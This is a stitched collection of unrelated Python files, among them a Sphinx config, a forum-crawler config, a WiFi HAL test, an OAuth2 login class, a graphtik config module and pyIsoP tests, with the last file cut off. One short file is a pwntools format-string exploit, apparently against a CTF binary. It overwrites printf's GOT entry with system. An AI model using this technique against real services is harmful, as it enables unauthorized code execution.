project = u"eNMS"
copyright = u"eNMS Automation"
# The short X.Y version.
version = "3.17.2"
# The full version, including alpha/beta/rc tags.
release = "3.17.2"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
modindex_common_prefix = []
html_theme_options = {"navigation_depth": 4}
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme" # winner, mobile friendly
# The style sheet to use for HTML pages. A file of that name must exist either
# in Sphinx’ static/ path, or in one of the custom paths given in
# html_static_path. Default is the stylesheet given by the selected theme.
html_style = "custom.css"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
|
#!/usr/bin/env python
from pwn import *
r = remote('bamboofox.cs.nctu.edu.tw', 22003)
# r = process('./binary_300')
system_plt = 0x8048410
printf_got = 0x804a00c
fmt = p32(printf_got + 2) + p32(printf_got)
fmt += '%{}c%7$hn'.format(0x0804 - 8)
fmt += '%{}c%8$hn'.format(0x8410 - 0x0804)
r.sendline(fmt)
r.interactive()
|
from setuptools import setup, find_packages
VERSION = '0.0.1'
DESCRIPTION = 'Python Environment Package Status'
LONG_DESCRIPTION = 'Python Environment Package Status helps in determining the package versions used ' \
'and relative version/timeline to the latest/stable versions'
requirements = [
]
# Setting up
setup(
name="py_enviornment_status",
version=VERSION,
author="Vamsee Achanta",
author_email="<[email protected]>",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
packages=find_packages(),
install_requires=[], # add any additional packages that
# needs to be installed along with your package. Eg: 'caer'
keywords=['python', 'first package'],
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Education",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
]
) |
# 红豆社区-广西
TASK_NAME = 'bbs_gxnews'
# 起始URL
START_URL = 'http://hongdou.gxnews.com.cn'
# 控制域,必须为list格式
DOMAIN = ['hongdou.gxnews']
# 请求头
HEADERS = {
'Host': 'hongdou.gxnews.com.cn',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
# xpath规则
XPATHER_HREF = ".//*/@href"
# 字段模版
# {
# "title": "",
# "news_date": "",
# "source": "",
# "author": "",
# "navigation": "",
# "content": "",
# "editor": "",
# "tags": ""
# },
XPATHER_NEWS_LIST = [
{
"title": "substring-after(substring-before(normalize-space(//*[contains(@class,'postbit')][1]//*[@class='thead']),'(您是'),'标题:')",
"news_date": "substring-before(substring-after(normalize-space(//*[contains(@class,'postbit')][1]//*[@width='230']),'发表于'),'第')",
"source": "",
"author": "normalize-space(.//*[contains(@class,'postbit')][1]//*[contains(@id,'postmenu')])",
"navigation": "translate(normalize-space(.//*[contains(text(),'您现在的位置')]),'您现在的位置::','')",
"content": "//*[contains(@class,'postbit')][1]//*[@class='viewmessage']/descendant::text()",
"editor": "",
"tags": ".//*[@name='keywords']/@content"
},
]
# 正则匹配规则,此处为静态页面url的正则表达式,匹配以下的规则的网址将抓取其中新闻内容
REGEX_URL = r'/viewthread-\d*\.s*html*'
# 响应时间
# TIMEOUT = 20
|
def run_case(filename):
with open(filename, 'r') as f:
groups = f.read().split('\n\n')
# P1
group_sum = sum([len(set(group.replace('\n', ''))) for group in groups])
print(f'Sum of group responses: {group_sum}')
# P2
num_yes_list = []
for group in groups:
all_yes = 0
num_people = group.count('\n') + 1
responses = group.replace('\n', '')
resp_set = set(responses)
for resp in resp_set:
if responses.count(resp) == num_people:
all_yes += 1
num_yes_list.append(all_yes)
print(f'Found sum: {sum(num_yes_list)} for num_yes_list: {num_yes_list}')
if __name__ == '__main__':
filenames = ['input-sample.txt', 'input-d6p1.txt']
for filename in filenames:
run_case(filename)
|
#T# the formula for the area of a trapezoid can be understood as the sum of the areas of the two triangles that appear when drawing one of its diagonals
#T# to draw the trapezoid with the two triangles, the pyplot module of the matplotlib package is used
import matplotlib.pyplot as plt
#T# create the figure and axes
fig1, ax1 = plt.subplots(1, 1)
#T# hide the spines and ticks
for it1 in ['top', 'bottom', 'left', 'right']:
ax1.spines[it1].set_visible(False)
ax1.get_xaxis().set_visible(False)
ax1.get_yaxis().set_visible(False)
#T# create the vertices of the trapezoid
A, B, C, D = [0, 0], [1, 3], [5, 3], [7, 0]
#T# join the vertices and one diagonal of the trapezoid
plt.plot([B[0], C[0], D[0], A[0], B[0], D[0]], [B[1], C[1], D[1], A[1], B[1], D[1]], color = '#000000')
#T# create the height guide
plt.plot([B[0], B[0]], [A[1], B[1]], '--', color = '#000000')
#T# set the math text font to the Latex default, Computer Modern
import matplotlib
matplotlib.rcParams['mathtext.fontset'] = 'cm'
#T# name the bases, the height, and the areas
plt.text((B[0] + C[0])/2, (B[1] + C[1])/2, r'$b$', ha = 'center', va = 'bottom', size = 18)
plt.text((A[0] + D[0])/2, (A[1] + D[1])/2 - 0.05, r'$B$', ha = 'center', va = 'top', size = 18)
plt.text(B[0] + 0.1, (A[1] + B[1])/2, r'$h$', ha = 'left', va = 'center', size = 18)
plt.text((B[0] + C[0] + D[0])/3, (B[1] + C[1] + D[1])/3, r'$A_1$', ha = 'center', va = 'center', size = 18)
plt.text((A[0] + B[0] + D[0])/3, (A[1] + B[1] + D[1])/3, r'$A_2$', ha = 'center', va = 'center', size = 18)
#T# show the result
plt.show() |
##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>3</version>
<name>TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode</name>
<primitive_test_id/>
<primitive_test_name>WIFIHAL_GetOrSetParamStringValue</primitive_test_name>
<primitive_test_version>8</primitive_test_version>
<status>FREE</status>
<synopsis>Set Security Secondary Radius Server details with non-enterprise modes and check whether the return status is failure</synopsis>
<groups_id/>
<execution_time>5</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TS_WIFIHAL_531</test_case_id>
<test_objective>Set Security Secondary Radius Server details with non-enterprise modes and check whether the return status is failure</test_objective>
<test_type>Negative</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components should be in a running state else invoke cosa_start.sh manually that includes all the ccsp components and TDK Component
2.TDK Agent should be in running state or invoke it through StartTdk.sh script</pre_requisite>
<api_or_interface_used>wifi_getApSecurityModeSupported()
wifi_setApSecuritySecondaryRadiusServer()
wifi_getApSecurityModeEnabled()
wifi_setApSecurityModeEnabled()</api_or_interface_used>
<input_parameters>methodname : getApSecurityModeSupported
methodName : setApSecuritySecondaryRadiusServer
methodName : getApSecurityModeEnabled
methodName : setApSecurityModeEnabled
radioIndex : 0</input_parameters>
<automation_approch>1. Load wifihal module
2. Using WIFIHAL_GetOrSetParamStringValue invoke wifi_getApSecurityModeSupported() and get the supported security modes.
3. Using WIFIHAL_GetOrSetParamStringValue invoke wifi_getApSecurityModeEnabled() and save the initial value.
4. Set the security modes to Non Enterprise modes from the supported modes list by invoking the API wifi_setApSecurityModeEnabled(). Cross verify the set operation by invoking wifi_getApSecurityModeEnabled() API.
5. For each Non Enterprise mode, try to set the Security Radius Server details by invoking wifi_setApSecuritySecondaryRadiusServer(). Check if the Set operation returns Failure as expected.
6. Revert back to initial Security mode
7. Unload Wifihal module.</automation_approch>
<expected_output>Security Secondary Radius Server details set with non-enterprise modes should return failure</expected_output>
<priority>High</priority>
<test_stub_interface>Wifihal</test_stub_interface>
<test_script>TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode</test_script>
<skipped>No</skipped>
<release_version>M87</release_version>
<remarks/>
</test_cases>
<script_tags/>
</xml>
'''
def GetorSetApSecurityRadiusServer(obj, primitive, radioIndex, IPAddress, port, RadiusSecret, methodname):
#Prmitive test case which is associated to this Script
tdkTestObj = obj.createTestStep(primitive);
#Radio index is 0 for 2.4GHz and 1 for 5GHz
tdkTestObj.addParameter("radioIndex",radioIndex);
tdkTestObj.addParameter("methodName", methodname);
tdkTestObj.addParameter("IPAddress", IPAddress);
tdkTestObj.addParameter("port", port);
tdkTestObj.addParameter("RadiusSecret", RadiusSecret);
expectedresult="SUCCESS";
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails();
return (tdkTestObj, actualresult, details);
def setSecondaryRadiusServer(idx, setMode) :
expectedresult = "FAILURE";
radioIndex = idx;
setMethod = "setApSecuritySecondaryRadiusServer"
primitive = "WIFIHAL_GetOrSetSecurityRadiusServer"
IPAddress = "1.1.2.2"
port = 1234
RadiusSecret = "12345"
#Calling the method to execute wifi_setApSecuritySecondaryRadiusServer()
tdkTestObj, actualresult, details = GetorSetApSecurityRadiusServer(obj, primitive, radioIndex, IPAddress, port, RadiusSecret, setMethod)
print "Set values: IPAddress = 1.1.2.2, port = 1234, RadiusSecret = 12345"
print "TEST STEP : Should not set the ApSecuritySecondaryRadiusServer details in the Non Enterprise mode %s"%setMode
print "EXPECTED RESULT : Should not set the IPAddress, port and RadiusSecret"
if expectedresult in actualresult :
tdkTestObj.setResultStatus("SUCCESS");
print "ACTUAL RESULT : IPAddress, port and RadiusSecret are not set successfully in the Non Enterprise mode"
print "TEST EXECUTION RESULT : SUCCESS"
else :
tdkTestObj.setResultStatus("FAILURE");
print "ACTUAL RESULT : IPAddress, port and RadiusSecret are set successfully in the Non Enterprise mode"
print "TEST EXECUTION RESULT : FAILURE"
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from wifiUtility import *;
radio = "2.4G"
#Test component to be tested
obj = tdklib.TDKScriptingLibrary("wifihal","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
obj.configureTestCase(ip,port,'TS_WIFIHAL_2.4GHzSetApSecuritySecondaryRadiusServer_NonEnterpriseMode');
loadmodulestatus =obj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %loadmodulestatus
if "SUCCESS" in loadmodulestatus.upper():
obj.setLoadModuleStatus("SUCCESS");
tdkTestObjTemp, idx = getIndex(obj, radio);
## Check if a invalid index is returned
if idx == -1:
print "Failed to get radio index for radio %s\n" %radio;
tdkTestObjTemp.setResultStatus("FAILURE");
else:
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModesSupported"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeSupported()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
supportedModes = details.split(":")[1].strip()
supportedModes = supportedModes.split(',')
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
initMode = details.split(":")[1].strip()
if initMode in supportedModes:
tdkTestObj.setResultStatus("SUCCESS");
print "Initial ApSecurityMode is from the supported modes"
NonEnterpriseModes = list(filter(lambda x: 'Personal' in x, supportedModes))
print "Setting and checking the Non Enterprise security modes : ",NonEnterpriseModes
for setMode in NonEnterpriseModes :
print "Setting the ApSecurityMode to ",setMode
expectedresult="SUCCESS";
apIndex = idx;
setMethod = "setApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_setApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, setMode, setMethod)
if expectedresult in actualresult:
expectedresult="SUCCESS";
apIndex = idx;
getMethod = "getApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
#Calling the method to execute wifi_getApSecurityModeEnabled()
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, "0", getMethod)
if expectedresult in actualresult:
finalMode = details.split(":")[1].strip()
if finalMode == setMode:
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP: Compare the set and get values of ApSecurityModeEnabled"
print "EXPECTED RESULT: Set and get values of ApSecurityModeEnabled should be same"
print "ACTUAL RESULT: Set and get values of ApSecurityModeEnabled are the same"
print "setMode = ",setMode
print "getMode = ",finalMode
print "TEST EXECUTION RESULT : SUCCESS"
setSecondaryRadiusServer(idx, setMode);
else:
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP: Compare the set and get values of ApSecurityModeEnabled"
print "EXPECTED RESULT: Set and get values of ApSecurityModeEnabled should be same"
print "ACTUAL RESULT: Set and get values of ApSecurityModeEnabled are NOT the same"
print "setMode = ",setMode
print "getMode = ",finalMode
print "TEST EXECUTION RESULT : FAILURE"
else:
tdkTestObj.setResultStatus("FAILURE");
print "wifi_getApSecurityModeEnabled() call failed after set operation"
print "TEST EXECUTION RESULT : FAILURE"
else:
tdkTestObj.setResultStatus("FAILURE");
print "wifi_setApSecurityModeEnabled() call failed"
print "TEST EXECUTION RESULT : FAILURE"
#Revert the ApSecurityModeEnabled back to initial value
expectedresult="SUCCESS";
apIndex = idx;
setMethod = "setApSecurityModeEnabled"
primitive = 'WIFIHAL_GetOrSetParamStringValue'
tdkTestObj, actualresult, details = ExecuteWIFIHalCallMethod(obj, primitive, apIndex, initMode, setMethod)
if expectedresult in actualresult:
print "Successfully reverted the ApSecurityModeEnabled to initial value"
tdkTestObj.setResultStatus("SUCCESS");
print "TEST EXECUTION RESULT : SUCCESS"
else :
print "Unable to revert the ApSecurityModeEnabled"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
else :
tdkTestObj.setResultStatus("FAILURE");
print "Initial ApSecurityMode is not in supported modes"
print "TEST EXECUTION RESULT : FAILURE"
else :
print "wifi_getApSecurityModeEnabled() failed"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
else :
print "wifi_getApSecurityModeSupported() failed"
tdkTestObj.setResultStatus("FAILURE");
print "TEST EXECUTION RESULT : FAILURE"
obj.unloadModule("wifihal");
else:
print "Failed to load wifi module";
obj.setLoadModuleStatus("FAILURE");
|
# Copyright 2016, Yahoo Inc.
# Licensed under the terms of the Apache License, Version 2.0. See the LICENSE file associated with the project for terms.
"""
:term:`configurations` for network execution, and utilities on them.
.. seealso:: methods :func:`.plot.active_plotter_plugged()`, :func:`.plot.set_active_plotter()`,
:func:`.plot.get_active_plotter()`
Plot configrations were not defined here, not to pollute import space early,
until they are actually needed.
.. note::
The contant-manager function ``XXX_plugged()`` or ``XXX_enabled()`` do NOT launch
their code blocks using :meth:`contextvars.Context.run()` in a separate "context",
so any changes to these or other context-vars will persist
(unless they are also done within such context-managers)
"""
import ctypes
import os
from contextlib import contextmanager
from contextvars import ContextVar
from functools import partial
from multiprocessing import Value
from typing import Optional
_debug_env_var = os.environ.get("GRAPHTIK_DEBUG")
_debug: ContextVar[Optional[bool]] = ContextVar(
"debug",
default=_debug_env_var and (_debug_env_var.lower() not in "0 false off no".split()),
)
_abort: ContextVar[Optional[bool]] = ContextVar(
"abort", default=Value(ctypes.c_bool, lock=False)
)
_skip_evictions: ContextVar[Optional[bool]] = ContextVar("skip_evictions", default=None)
_layered_solution: ContextVar[Optional[bool]] = ContextVar(
"layered_solution", default=None
)
_execution_pool: ContextVar[Optional["Pool"]] = ContextVar(
"execution_pool", default=None
)
_parallel_tasks: ContextVar[Optional[bool]] = ContextVar("parallel_tasks", default=None)
_marshal_tasks: ContextVar[Optional[bool]] = ContextVar("marshal_tasks", default=None)
_endure_operations: ContextVar[Optional[bool]] = ContextVar(
"endure_operations", default=None
)
_reschedule_operations: ContextVar[Optional[bool]] = ContextVar(
"reschedule_operations", default=None
)
def _getter(context_var) -> Optional[bool]:
return context_var.get()
@contextmanager
def _tristate_set(context_var, enabled):
return context_var.set(enabled if enabled is None else bool(enabled))
@contextmanager
def _tristate_armed(context_var: ContextVar, enabled=True):
"""Assumes "enabled" if `enabled` flag is None."""
resetter = context_var.set(enabled if enabled is None else bool(enabled))
try:
yield
finally:
context_var.reset(resetter)
debug_enabled = partial(_tristate_armed, _debug)
"""
Like :func:`set_debug()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_debug = partial(_getter, _debug)
"""
Return :func:`.set_debug` or `True` if :envvar:`GRAPHTIK_DEBUG` not one of ``0 false off no``.
Affected behavior when :ref:`debug` enabled:
.. debug-behavior-start
+ on errors, plots the 1st errored solution/plan/pipeline/net (in that order)
in an SVG file inside the temp-directory, and its path is logged in ERROR-level;
+ :term:`jetsam` logs in ERROR (instead of in DEBUG) all annotations on all calls
up the stack trace (logged from ``graphtik.jetsam.err`` logger);
+ :meth:`FnOp.compute()` prints out full given-inputs (not just their keys);
+ net objects print more details recursively, like fields (not just op-names) and
prune-comments;
+ plotted SVG diagrams include style-provenance as tooltips;
+ Sphinx extension also saves the original DOT file next to each image
(see :confval:`graphtik_save_dot_files`).
.. debug-behavior-end
.. Note::
The default is controlled with :envvar:`GRAPHTIK_DEBUG` environment variable.
Note that enabling this flag is different from enabling logging in DEBUG,
since it affects all code (eg interactive printing in debugger session,
exceptions, doctests), not just debug statements (also affected by this flag).
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
set_debug = partial(_tristate_set, _debug)
"""
Enable/disable debug-mode.
:param enabled:
- ``None, False, string(0, false, off, no)``: Disabled
- anything else: Enable DEBUG
see :func:`is_debug()`
"""
def abort_run():
"""
Sets the :term:`abort run` global flag, to halt all currently or future executing plans.
This global flag is reset when any :meth:`.Pipeline.compute()` is executed,
or manually, by calling :func:`.reset_abort()`.
"""
_abort.get().value = True
def reset_abort():
"""Reset the :term:`abort run` global flag, to permit plan executions to proceed. """
_abort.get().value = False
def is_abort():
"""Return `True` if networks have been signaled to stop :term:`execution`."""
return _abort.get().value
evictions_skipped = partial(_tristate_armed, _skip_evictions)
"""
Like :func:`set_skip_evictions()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_skip_evictions = partial(_getter, _skip_evictions)
"""see :func:`set_skip_evictions()`"""
set_skip_evictions = partial(_tristate_set, _skip_evictions)
"""
When true, disable globally :term:`eviction`\\s, to keep all intermediate solution values, ...
regardless of asked outputs.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
solution_layered = partial(_tristate_armed, _layered_solution)
"""
Like :func:`set_layered_solution()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_layered_solution = partial(_getter, _layered_solution)
"""see :func:`set_layered_solution()`"""
set_layered_solution = partial(_tristate_set, _layered_solution)
"""
whether to store operation results into separate :term:`solution layer`
:param enable:
If false/true, it overrides any param given when executing a pipeline or a plan.
If None (default), results are layered only if there are NO :term:`jsonp` dependencies
in the network.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
@contextmanager
def execution_pool_plugged(pool: "Optional[Pool]"):
"""
Like :func:`set_execution_pool()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
resetter = _execution_pool.set(pool)
try:
yield
finally:
_execution_pool.reset(resetter)
def set_execution_pool(pool: "Optional[Pool]"):
"""
(deprecated) Set the process-pool for :term:`parallel` plan executions.
You may have to :also func:`set_marshal_tasks()` to resolve
pickling issues.
"""
return _execution_pool.set(pool)
def get_execution_pool() -> "Optional[Pool]":
"""(deprecated) Get the process-pool for :term:`parallel` plan executions."""
return _execution_pool.get()
tasks_in_parallel = partial(_tristate_armed, _parallel_tasks)
"""
(deprecated) Like :func:`set_parallel_tasks()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_parallel_tasks = partial(_getter, _parallel_tasks)
"""see :func:`set_parallel_tasks()`"""
set_parallel_tasks = partial(_tristate_set, _parallel_tasks)
"""
Enable/disable globally :term:`parallel` execution of operations.
:param enable:
- If ``None`` (default), respect the respective flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
tasks_marshalled = partial(_tristate_armed, _marshal_tasks)
"""
(deprecated) Like :func:`set_marshal_tasks()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_marshal_tasks = partial(_getter, _marshal_tasks)
"""(deprecated) see :func:`set_marshal_tasks()`"""
set_marshal_tasks = partial(_tristate_set, _marshal_tasks)
"""
(deprecated) Enable/disable globally :term:`marshalling` of :term:`parallel` operations, ...
inputs & outputs with :mod:`dill`, which might help for pickling problems.
:param enable:
- If ``None`` (default), respect the respective flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
"""
operations_endured = partial(_tristate_armed, _endure_operations)
"""
Like :func:`set_endure_operations()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_endure_operations = partial(_getter, _endure_operations)
"""see :func:`set_endure_operations()`"""
set_endure_operations = partial(_tristate_set, _endure_operations)
"""
Enable/disable globally :term:`endurance` to keep executing even if some operations fail.
:param enable:
- If ``None`` (default), respect the flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
."""
operations_reschedullled = partial(_tristate_armed, _reschedule_operations)
"""
Like :func:`set_reschedule_operations()` as a context-manager, resetting back to old value.
.. seealso:: disclaimer about context-managers at the top of this :mod:`.config` module.
"""
is_reschedule_operations = partial(_getter, _reschedule_operations)
"""see :func:`set_reschedule_operations()`"""
set_reschedule_operations = partial(_tristate_set, _reschedule_operations)
"""
Enable/disable globally :term:`rescheduling` for operations returning only *partial outputs*.
:param enable:
- If ``None`` (default), respect the flag on each operation;
- If true/false, force it for all operations.
:return:
a "reset" token (see :meth:`.ContextVar.set`)
."""
|
import json
from oic.utils.authn.client import CLIENT_AUTHN_METHOD
from idpproxy.social import Social
from oic.oauth2 import rndstr
from oic.oauth2 import Client
from oic.oauth2.message import ErrorResponse
from oic.oauth2.message import AccessTokenResponse
from oic.oauth2.message import AuthorizationResponse
from oic.oauth2.message import AuthorizationRequest
from oic.utils.http_util import Redirect
import logging
logger = logging.getLogger(__name__)
class OAuth2(Social):
def __init__(self, client_id, client_secret, **kwargs):
Social.__init__(self, client_id, client_secret, **kwargs)
self.access_token_response = AccessTokenResponse
try:
self._scope = ",".join(self.extra["scope"])
except KeyError:
self._scope = ""
self.token_response_body_type = "urlencoded"
#noinspection PyUnusedLocal
def begin(self, environ, server_env, start_response, cookie,
sid, info):
state = rndstr()
server_env["CACHE"].alternate_sid(sid, state)
callback = server_env["base_url"] + self.social_endpoint
# redirect the user to facebook for the authentication
ar = AuthorizationRequest().from_dict({"client_id": self.client_id,
"redirect_uri": callback,
"state": state,
"response_type": ["code"],
"scope": self._scope})
url = ar.request(self.extra["authorization_endpoint"])
logger.info("[OAuth2] callback url: %s" % url)
if cookie:
resp = Redirect(url, headers=[cookie])
else:
resp = Redirect(url)
return resp(environ, start_response)
#noinspection PyUnusedLocal
def userinfo_endpoint(self, tokenresp):
return self.extra["userinfo_endpoint"]
#noinspection PyUnusedLocal
def phaseN(self, environ, info, server_env, sid):
session = server_env["CACHE"][sid]
callback = server_env["base_url"] + self.social_endpoint
client = Client(client_id=self.client_id,
client_authn_method=CLIENT_AUTHN_METHOD)
response = client.parse_response(AuthorizationResponse, info, "dict")
logger.info("Response: %s" % response)
if isinstance(response, ErrorResponse):
logger.info("%s" % response)
session["authentication"] = "FAILED"
return False, "Authentication failed or permission not granted"
req_args = {
"redirect_uri": callback,
"client_secret": self.client_secret,
}
client.token_endpoint = self.extra["token_endpoint"]
tokenresp = client.do_access_token_request(
scope=self._scope,
body_type=self.token_response_body_type,
request_args=req_args,
authn_method="client_secret_post",
state=response["state"],
response_cls=self.access_token_response)
if isinstance(tokenresp, ErrorResponse):
logger.info("%s" % tokenresp)
session["authentication"] = "FAILED"
return False, "Authentication failed or permission not granted"
# Download the user profile and cache a local instance of the
# basic profile info
result = client.fetch_protected_resource(
self.userinfo_endpoint(tokenresp), token=tokenresp["access_token"])
logger.info("Userinfo: %s" % result.text)
profile = json.loads(result.text)
logger.info("PROFILE: %s" % (profile, ))
session["service"] = self.name
session["authentication"] = "OK"
session["status"] = "SUCCESS"
session["authn_auth"] = self.authenticating_authority
session["permanent_id"] = profile["id"]
server_env["CACHE"][sid] = session
return True, self.convert(profile), session
|
#! /usr/bin/env python
###############################################################################
# aruco_generator.py
#
# script testing basic generation of Aruco markers
#
# Code modified from that at:
# http://www.philipzucker.com/aruco-in-opencv/
#
# NOTE: Any plotting is set up for output, not viewing on screen.
# So, it will likely be ugly on screen. The saved PDFs should look
# better.
#
# Created: 10/21/19
# - Joshua Vaughan
# - [email protected]
# - http://www.ucs.louisiana.edu/~jev9637
#
# Modified:
# *
#
# TODO:
# *
###############################################################################
import numpy as np
import matplotlib.pyplot as plt
import cv2
import cv2.aruco as aruco
MARKER_IDS = [0, 1, 2, 3] # IDs for generated maker
MARKER_SIZE = 144 # Pixel size of (square) marker
aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)
for id in MARKER_IDS:
img = aruco.drawMarker(aruco_dict, id, MARKER_SIZE)
# Write the generated image to a file
cv2.imwrite(f"test_marker_{id}.svg", img)
# Then, show is
cv2.imshow('frame', img)
cv2.waitKey(0)
cv2.destroyAllWindows() |
"""
Unit and regression test for the pyIsoP package.
"""
# Uses the pytest fixtures decorator to take the energy grid and use it for a series of tests including
# values, writing, isotherms and etc
# Import package, test suite, and other packages as needed
import pyIsoP
import pytest
import sys
#%%
def test_pyIsoP_imported():
"""Sample test, will always pass so long as import statement worked"""
assert "pyIsoP" in sys.modules
#%%
@pytest.fixture
def compute_grid():
import os
from pyIsoP import grid3D, forcefields, writer
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/ZIF-4_mod.cif'
t1=grid3D.grid3D(path_to_file,spacing=0.5 )
f1=forcefields.forcefields(t1,sigma=3.95, epsilon=46,forcefield=os.path.dirname(pyIsoP.__file__)+'/../forcefield/UFF')
t2= grid3D.grid3D.grid_calc(t1,"lj",f1)
return t2
#%%
@pytest.fixture
def compute_grid_dask():
import os
from pyIsoP import grid3D, forcefields, writer
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/ZIF-4_mod.cif'
t1=grid3D.grid3D(path_to_file,spacing=0.5 )
f1=forcefields.forcefields(t1,sigma=3.95, epsilon=46,forcefield=os.path.dirname(pyIsoP.__file__)+'/../forcefield/UFF')
grid_dask= grid3D.grid3D.grid_calc_dask(t1,f1)
t1.pot=grid_dask.compute()
return t1
#%%
@pytest.fixture
def compute_ml():
import os
import pyIsoP
from pyIsoP import machlearn
print("Testing the machine learning using GPR")
path_to_file = os.path.dirname(pyIsoP.__file__)+'/data/for_gpr_large.dat'
ml=machlearn.machlearn(restarts=1)
ml=machlearn.machlearn.GPR4n1(ml,path_to_file,0.1)
return ml
#%%
@pytest.fixture
def compute_histo(compute_grid):
from pyIsoP import histo
h=histo.histo()
h=histo.histo.grid2histo(compute_grid,h)
return h
#%%
def test_grid_values(compute_grid):
import numpy as np
print("Testing the energy grid calculation")
print(str(np.min(compute_grid.pot))), "Energy minimum looks good!"
assert np.abs(np.min(np.round(compute_grid.pot, decimals=2)+1819.74)<=1E-4), "Grid minimum does not match reference"
# assert(np.max(compute_grid.pot_repeat)==)
#%%
def test_grid_values_dask(compute_grid_dask):
test_grid_values(compute_grid_dask)
#%%
def test_write_grid(compute_grid):
import pyIsoP
import os
from pyIsoP import writer
import numpy as np
print("Testing the grid writer")
path_to_out_vtk = os.path.dirname(pyIsoP.__file__)+'/data/zif-4_grid'
path_to_out_pdb = os.path.dirname(pyIsoP.__file__)+'/data/zif-4_replicated.pdb'
print("Writing .vts and .pdb tests into the data folder")
writer.writer.write_vts(compute_grid,path_to_out_vtk, 1,1,1)
writer.writer.write_frame(compute_grid,path_to_out_pdb)
#should we assert something..?
#%%
def test_write_grid_dask(compute_grid_dask):
test_write_grid(compute_grid_dask)
#%%
def test_histo_vals(compute_histo):
import numpy as np
print("Testing histogram values")
# some check on the zif-4 energy histogram, within 1 kBT of expected
reference_hist = np.array([-23.89147811, -23.40855962, -22.92564113, -22.44272265,
-21.95980416, -21.47688567, -20.99396718, -20.5110487 ,
